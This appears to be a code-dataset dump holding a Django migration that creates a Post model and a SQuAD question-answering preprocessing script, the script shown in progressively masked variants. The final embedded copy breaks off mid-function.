code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('base', '0007_topfilter')]
operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.
deletion.CASCADE, parent_link=True, primary_key=True, serialize=
False, to='base.Base')), ('title', models.CharField(max_length=50)),
('text', models.TextField()), ('post_related_user', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)
)], bases=('base.base',))]
<|reserved_special_token_1|>
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('base', '0007_topfilter')]
operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',
models.OneToOneField(auto_created=True, on_delete=django.db.models.
deletion.CASCADE, parent_link=True, primary_key=True, serialize=
False, to='base.Base')), ('title', models.CharField(max_length=50)),
('text', models.TextField()), ('post_related_user', models.
ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)
)], bases=('base.base',))]
<|reserved_special_token_1|>
# Generated by Django 2.0.4 on 2018-04-30 14:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('base', '0007_topfilter'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),
('title', models.CharField(max_length=50)),
('text', models.TextField()),
('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),
],
bases=('base.base',),
),
]
|
flexible
|
{
"blob_id": "d13589979ba7b6facd8339111323270c9920a9bf",
"index": 8127,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('base', '0007_topfilter')]\n operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',\n models.OneToOneField(auto_created=True, on_delete=django.db.models.\n deletion.CASCADE, parent_link=True, primary_key=True, serialize=\n False, to='base.Base')), ('title', models.CharField(max_length=50)),\n ('text', models.TextField()), ('post_related_user', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE,\n related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)\n )], bases=('base.base',))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('base', '0007_topfilter')]\n operations = [migrations.CreateModel(name='Post', fields=[('base_ptr',\n models.OneToOneField(auto_created=True, on_delete=django.db.models.\n deletion.CASCADE, parent_link=True, primary_key=True, serialize=\n False, to='base.Base')), ('title', models.CharField(max_length=50)),\n ('text', models.TextField()), ('post_related_user', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE,\n related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)\n )], bases=('base.base',))]\n",
"step-5": "# Generated by Django 2.0.4 on 2018-04-30 14:01\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('base', '0007_topfilter'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('base_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='base.Base')),\n ('title', models.CharField(max_length=50)),\n ('text', models.TextField()),\n ('post_related_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='post_related_user_name', to=settings.AUTH_USER_MODEL)),\n ],\n bases=('base.base',),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Data pre-processing
"""
import os
import corenlp
import numpy as np
import ujson as json
from tqdm import tqdm
from collections import Counter
from bilm import dump_token_embeddings
import sys
sys.path.append('../..')
from LIB.utils import save
def process(json_file, outpur_dir, exclude_titles=None, include_titles=None):
"""
:param json_file: original data in json format
:param outpur_dir: the output directory of pre-processed data
:param exclude_titles: article titles to exclude
:param include_titles: article titles to include
"""
para_file = "{}/paras".format(outpur_dir)
question_file = "{}/questions".format(outpur_dir)
sent_file = "{}/sents".format(outpur_dir)
answer_file = "{}/answers".format(outpur_dir)
print("Generating {} raw data...".format(json_file))
max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0
with open(json_file, "r") as fh, corenlp.CoreNLPClient(annotators="tokenize ssplit pos ner".split(),
endpoint="http://localhost:9099", timeout=50000) as client:
source = json.load(fh)
for article in tqdm(source["data"]):
title = article["title"]
if include_titles and title not in include_titles:
continue
if exclude_titles and title in exclude_titles:
continue
for para in article["paragraphs"]:
paragraphs, questions, answers, sents, ids = [], [], [], [], []
paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [], [], []
paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [], [], []
answers_index, sents_index = [], []
# paragraph
context = para["context"]
if not context.strip():
continue
ann_para = client.annotate(context)
max_sent = max(max_sent, len(ann_para.sentence))
max_sent_len = max(max_sent_len, max(map(lambda x: len(x.token), ann_para.sentence)))
ann_para_tokens, paragraph_tokens, paragraph_pos, paragraph_ner = [], [], [], []
for sent in ann_para.sentence:
for token in sent.token:
ann_para_tokens.append(token)
paragraph_tokens.append(token.word)
paragraph_pos.append(token.pos)
paragraph_ner.append(token.ner)
# questions
for qa in para["qas"]:
# question
ques = qa["question"]
id = qa["id"]
if not ques.strip():
continue
ann_que = client.annotate(ques)
max_que_len = max(max_que_len, len(ann_que.sentence[0].token))
question_tokens, question_pos, question_ner = [], [], []
for sent in ann_que.sentence:
for token in sent.token:
question_tokens.append(token.word)
question_pos.append(token.pos)
question_ner.append(token.ner)
# answer
all_answer_tokens, all_answer_pos, all_answer_ner, all_answer_index = [], [], [], []
all_sent_tokens, all_sent_pos, all_sent_ner, all_sent_index = [], [], [], []
for answer in qa["answers"]:
answer_text = answer["text"]
if not answer_text.strip():
continue
ann_ans = client.annotate(answer_text)
answer_tokens, answer_pos, answer_ner = [], [], []
for sent in ann_ans.sentence:
for token in sent.token:
answer_tokens.append(token.word)
answer_pos.append(token.pos)
answer_ner.append(token.ner)
all_answer_tokens.append(' '.join(answer_tokens))
all_answer_pos.append(' '.join(answer_pos))
all_answer_ner.append(' '.join(answer_ner))
answer_start = answer['answer_start']
answer_end = answer_start + len(answer_text)
# sentence
sentence = []
for sent in ann_para.sentence:
if sent.characterOffsetBegin <= answer_start <= sent.characterOffsetEnd or \
sent.characterOffsetBegin <= answer_end <= sent.characterOffsetEnd:
sentence.append(sent)
sentence = [token for sent in sentence for token in sent.token]
sentence_tokens = [token.word for token in sentence]
sentence_pos = [token.pos for token in sentence]
sentence_ner = [token.ner for token in sentence]
all_sent_tokens.append(' '.join(sentence_tokens))
all_sent_pos.append(' '.join(sentence_pos))
all_sent_ner.append(' '.join(sentence_ner))
# sentence index
y1_sent = sentence[0].tokenBeginIndex
y2_sent = sentence[-1].tokenBeginIndex
# answer index
y1_ans = None
for i, token in enumerate(sentence):
if token.beginChar - 1 <= answer_start <= token.endChar:
y1_ans = sentence[0].tokenBeginIndex + i
try:
assert y1_ans != None
except:
continue
y2_ans = y1_ans + len(answer_tokens) - 1
all_answer_index.append("{},{}".format(y1_ans, y2_ans))
all_sent_index.append("{},{}".format(y1_sent, y2_sent))
paragraphs.append(' '.join(paragraph_tokens))
paragraphs_pos.append(' '.join(paragraph_pos))
paragraphs_ner.append(' '.join(paragraph_ner))
questions.append(' '.join(question_tokens))
questions_pos.append(' '.join(question_pos))
questions_ner.append(' '.join(question_ner))
answers.append('\t'.join(all_answer_tokens))
answers_pos.append('\t'.join(all_answer_pos))
answers_ner.append('\t'.join(all_answer_ner))
answers_index.append('\t'.join(all_answer_index))
sents.append('\t'.join(all_sent_tokens))
sents_pos.append('\t'.join(all_sent_pos))
sents_ner.append('\t'.join(all_sent_ner))
sents_index.append('\t'.join(all_sent_index))
ids.append(id)
# save para
with open("{}.tok".format(para_file), 'a') as f:
f.write('\n'.join(paragraphs) + '\n')
with open("{}.pos".format(para_file), 'a') as f:
f.write('\n'.join(paragraphs_pos) + '\n')
with open("{}.ner".format(para_file), 'a') as f:
f.write('\n'.join(paragraphs_ner) + '\n')
with open("{}.id".format(para_file), 'a') as f:
f.write('\n'.join(ids) + '\n')
# save question
with open("{}.tok".format(question_file), 'a') as f:
f.write('\n'.join(questions) + '\n')
with open("{}.pos".format(question_file), 'a') as f:
f.write('\n'.join(questions_pos) + '\n')
with open("{}.ner".format(question_file), 'a') as f:
f.write('\n'.join(questions_ner) + '\n')
# save answer
with open("{}.tok".format(answer_file), 'a') as f:
f.write('\n'.join(answers) + '\n')
with open("{}.pos".format(answer_file), 'a') as f:
f.write('\n'.join(answers_pos) + '\n')
with open("{}.ner".format(answer_file), 'a') as f:
f.write('\n'.join(answers_ner) + '\n')
with open("{}.index".format(answer_file), 'a') as f:
f.write("\n".join(answers_index) + '\n')
# save sent
with open("{}.tok".format(sent_file), 'a') as f:
f.write('\n'.join(sents) + '\n')
with open("{}.pos".format(sent_file), 'a') as f:
f.write('\n'.join(sents_pos) + '\n')
with open("{}.ner".format(sent_file), 'a') as f:
f.write('\n'.join(sents_ner) + '\n')
with open("{}.index".format(sent_file), 'a') as f:
f.write("\n".join(sents_index) + '\n')
# get BIO labels
label(para_file, answer_file)
def label(para_file, answer_file):
# get the answer BIO label for paragraph
max_node = 0
with open("{}.tok".format(para_file), 'r') as fp, open("{}.label".format(para_file), 'a') as fl, \
open("{}.index".format(answer_file), 'r') as fa:
while True:
para = fp.readline()
if not para:
break
words = [p for p in para.strip().split(' ')]
max_node = max(len(words), max_node)
answer = fa.readline()
labels = []
try:
start, end = map(int, answer.split('\t')[0].split(','))
for i in range(len(words)):
if start <= i <= end:
# answer words
if i == start:
labels.append('B')
else:
labels.append('I')
else:
# non answer words
labels.append('O')
except:
pass
fl.write(' '.join(labels) + '\n')
return max_node
def get_data(train_json, dev_json, test_title_file, output_dir):
test_titles = open(test_title_file, 'r').readlines()
test_titles = set([line.strip() for line in test_titles])
process(train_json, "{}/train/".format(output_dir), exclude_titles=test_titles)
process(dev_json, "{}/dev/".format(output_dir))
process(train_json, "{}/test/".format(output_dir), include_titles=test_titles)
def get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size, vocab_file):
"""
get word embedding matrix from glove
"""
print("Generating word embedding...")
# load word embeddings
embedding_dict = {}
with open(emb_file, "r", encoding="utf-8") as fh:
for line in tqdm(fh, total=emb_size):
array = line.split()
word = "".join(array[0:-vec_size])
vector = list(map(float, array[-vec_size:]))
embedding_dict[word] = vector
TRANSLATE = {
"-lsb-": "[", "-rsb-": "]", "-lrb-": "(", "-rrb-": ")", "-lcb-": "{",
"-rcb-": "}", "-LSB-": "[", "-RSB-": "]", "-LRB-": "(", "-RRB-": ")",
"-LCB-": "{", "-RCB-": "}"
}
SPECIAL_TOKENS = ["<NULL>", "<UNK>", "<S>", "</S>"]
words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))
words = SPECIAL_TOKENS + words
if vocab_size > 0:
words = words[:vocab_size]
with open(vocab_file, 'w') as f:
f.write('\n'.join(words[1:]))
embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))
word2idx_dict = {}
unknown_count = 0
for i, word in enumerate(words):
word2idx_dict[word] = i
if word in TRANSLATE:
word = TRANSLATE[word]
done = False
for w in (word, word.lower(), word.upper(), word.capitalize()):
if w in embedding_dict:
embedding[i] = embedding_dict[w]
done = True
break
if not done:
unknown_count += 1
return embedding, word2idx_dict, unknown_count
def get_tag_embedding(counter, data_type, vec_size):
"""
get pos/ner/label tags' embedding matrix
"""
print("Generating {} tag embedding...".format(data_type))
SPECIAL_TOKENS = ["<NULL>", "<UNK>"]
tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x[1], reverse=True)))
tags = SPECIAL_TOKENS + tags
embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))
word2idx_dict = {w: i for i, w in enumerate(tags)}
return embedding, word2idx_dict
def get_vocab(config):
print("Get the vocabulary...")
word_counter, char_counter = Counter(), Counter()
pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()
files = [(config.train_para_file, config.train_question_file), (config.dev_para_file, config.dev_question_file)]
for para_file, que_file in files:
with open("{}.tok".format(para_file), 'r') as fp, open("{}.tok".format(que_file), 'r') as fq, \
open("{}.pos".format(para_file), 'r') as fpp, open("{}.pos".format(que_file), 'r') as fqp, \
open("{}.ner".format(para_file), 'r') as fpn, open("{}.ner".format(que_file), 'r') as fqn, \
open("{}.label".format(para_file), 'r') as fpl:
while True:
para, question = fp.readline(), fq.readline()
pos, que_pos = fpp.readline(), fqp.readline()
ner, que_ner = fpn.readline(), fqn.readline()
label = fpl.readline()
if not question or not para:
break
if config.lower_word:
para = para.lower()
question = question.lower()
para_tokens = para.strip().split(' ')
que_tokens = question.strip().split(' ')
pos_tags = pos.strip().split(' ')
ner_tags = ner.strip().split(' ')
que_pos_tags = que_pos.strip().split(' ')
que_ner_tags = que_ner.strip().split(' ')
labels = label.strip().split(' ')
for token in para_tokens + que_tokens:
word_counter[token] += 1
for char in list(token):
char_counter[char] += 1
for pos_tag in pos_tags + que_pos_tags:
pos_counter[pos_tag] += 1
for ner_tag in ner_tags + que_ner_tags:
ner_counter[ner_tag] += 1
for label in labels:
label_counter[label] += 1
word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter, emb_file=config.glove_word_file,
emb_size=config.glove_word_size,
vocab_size=config.vocab_size_limit,
vec_size=config.glove_dim, vocab_file=config.vocab_file)
char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, "char", vec_size=config.char_dim)
pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, "pos", vec_size=config.pos_dim)
ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, "ner", vec_size=config.ner_dim)
label_emb_mat, label2idx_dict = get_tag_embedding(label_counter, "label", vec_size=config.label_dim)
print("{} out of {} are not in glove".format(unk_num, len(word2idx_dict)))
print("{} chars".format(char_emb_mat.shape[0]))
print("{} pos tags, {} ner tags, {} answer labels, {} chars".format(
pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0], char_emb_mat.shape[0]))
save(config.word_emb_file, word_emb_mat, message="word embedding")
save(config.char_emb_file, char_emb_mat, message="char embedding")
save(config.pos_emb_file, pos_emb_mat, message="pos embedding")
save(config.ner_emb_file, ner_emb_mat, message="ner embedding")
save(config.label_emb_file, label_emb_mat, message="label embedding")
save(config.word_dictionary, word2idx_dict, message="word dictionary")
save(config.char_dictionary, char2idx_dict, message="char dictionary")
save(config.pos_dictionary, pos2idx_dict, message="pos dictionary")
save(config.ner_dictionary, ner2idx_dict, message="ner dictionary")
save(config.label_dictionary, label2idx_dict, message="label dictionary")
print("Dump elmo word embedding...")
token_embedding_file = config.embedding_file
dump_token_embeddings(
config.vocab_file, config.elmo_options_file, config.elmo_weight_file, token_embedding_file
)
if __name__ == '__main__':
# process data
os.system("mkdir data; mkdir data/processed; mkdir data/processed/train; "
"mkdir data/processed/dev; mkdir data/processed/test")
get_data("../../LIB/squad/train-v1.1.json", "../../LIB/squad/dev-v1.1.json",
"../../LIB/squad/doclist-test.txt", "data/processed")
|
normal
|
{
"blob_id": "0c37806f0a7c0976711edd685fd64d2616147cb6",
"index": 4623,
"step-1": "<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\n<mask token>\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in 